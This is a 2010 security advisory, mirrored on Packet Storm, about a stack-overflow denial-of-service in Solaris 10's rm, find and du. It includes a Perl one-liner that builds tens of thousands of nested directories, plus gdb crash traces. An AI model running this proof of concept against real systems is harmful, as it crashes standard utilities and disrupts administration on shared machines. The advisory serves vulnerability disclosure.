Sun Solaris 10 filesystem rm(1),find(1),etc Denial Of Service

2010-05-22T00:00:00
ID PACKETSTORM:89800
Type packetstorm
Reporter Maksymilian Arciemowicz
Modified 2010-05-22T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[ Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service ]  
  
Author: Maksymilian Arciemowicz  
SecurityReason.com  
Date:  
- - Dis.: 17.04.2010  
- - Pub.: 21.05.2010  
  
Affected Software:  
- - Sun Solaris 10 10/09  
  
Original URL:  
http://securityreason.com/achievement_securityalert/85  
  
  
- --- 0.Description ---  
Solaris is a Unix operating system introduced by Sun Microsystems in  
1992 as the successor to SunOS.  
  
Sun Microsystems, Inc. is a wholly owned subsidiary of Oracle  
Corporation, selling computers, computer components, computer software,  
and information technology services. Sun was founded on February 24,  
1982. The company was headquartered in Santa Clara, California (part of  
Silicon Valley), on the former west campus of the Agnews Developmental  
Center.  
  
In computing, ZFS is a combined file system and logical volume manager  
designed by Sun Microsystems. The features of ZFS include support for  
high storage capacities, integration of the concepts of filesystem and  
volume management, snapshots and copy-on-write clones, continuous  
integrity checking and automatic repair, RAID-Z and native NFSv4 ACLs.  
  
  
- --- 1. Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service ---  
We can create, deep tree and when we will remove, scan or something else  
with this tree, affected program will crash with stack overflow sympton  
  
PoC:  
# perl -e '$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }'  
  
we need use 1..8000 or bigger value to make stack overflow.  
  
in result  
  
# du X  
Segmentation fault (core dumped)  
# /usr/local/bin/gdb -q du  
(no debugging symbols found)  
(gdb) r X  
Starting program: /usr/bin/du X  
(no debugging symbols found)  
(no debugging symbols found)  
(no debugging symbols found)  
(no debugging symbols found)  
  
Program received signal SIGSEGV, Segmentation fault.  
0xfeedfc8a in _ndoprnt () from /lib/libc.so.1  
(gdb) x/i $eip  
0xfeedfc8a <_ndoprnt+12>: push %ebp  
  
We can simple remove this dir for 1..8000  
  
# rm -rf X  
#  
  
but let`s try create this  
  
# perl -e '$a="Y";for(1..50000){ ! -d $a and mkdir $a and chdir $a }'  
# rm -rf Y  
Segmentation fault (core dumped)  
  
rm(1) has fail!  
  
what is wrong? stack overflow  
  
# /usr/local/bin/gdb -q rm  
(no debugging symbols found)  
(gdb) r -rf Y  
Starting program: /usr/bin/rm -rf Y  
(no debugging symbols found)  
(no debugging symbols found)  
  
Program received signal SIGSEGV, Segmentation fault.  
0x08051c03 in ?? ()  
(gdb) x/i $eip  
0x8051c03: push %ebx  
  
# find Y CX >> /dev/null  
Segmentation fault (core dumped)  
  
  
find(1) also fails!  
  
# /usr/local/bin/gdb -q find  
(no debugging symbols found)  
(gdb) r Y CX >> /dev/null  
Starting program: /usr/bin/find Y CX >> /dev/null  
(no debugging symbols found)  
(no debugging symbols found)  
(no debugging symbols found)  
(no debugging symbols found)  
  
Program received signal SIGSEGV, Segmentation fault.  
0xfeecfc8a in _ndoprnt () from /lib/libc.so.1  
(gdb) x/i $eip  
0xfeecfc8a <_ndoprnt+12>: push %ebp  
  
  
- --- 2. Fix ---  
Sun Solaris will fix this issue.  
  
  
- --- 3. Greets ---  
sp3x Infospec pi3  
  
  
- --- 4. Contact ---  
Author: SecurityReason.com [ Maksymilian Arciemowicz ]  
Email:  
- - cxib {a\./t] securityreason [d=t} com  
  
GPG:  
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
  
http://securityreason.com/  
http://securityreason.com/exploit_alert/ - Exploit Database  
http://securityreason.com/security_alert/ - Vulnerability Database  
  
-----BEGIN PGP SIGNATURE-----  
  
iEYEARECAAYFAkv2fyAACgkQpiCeOKaYa9ZQAwCfUrpH2glAhxCZVwpvOTKp8F38  
ssYAoMKcw4CX0hjK2CsCEkIAVyO5OB6e  
=dQfV  
-----END PGP SIGNATURE-----  
  
`